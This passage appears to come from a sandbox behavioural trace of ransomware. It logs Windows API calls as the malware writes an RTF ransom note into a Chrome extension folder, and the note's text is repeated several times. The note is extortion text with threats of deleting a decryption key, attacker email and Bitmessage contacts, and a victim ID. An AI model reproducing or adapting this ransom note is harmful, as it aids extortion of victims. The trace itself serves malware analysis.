w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 8717 [0288.011] WriteFile (in: hFile=0x294, lpBuffer=0x2374138*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2374138*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0288.029] CloseHandle (hObject=0x294) returned 1 [0288.030] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\km\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\km\\#readme_eman#.rtf")) returned 0xffffffff [0288.030] GetLastError () returned 0x2 [0288.030] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\km\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\km\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0288.030] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0288.030] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0288.030] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me 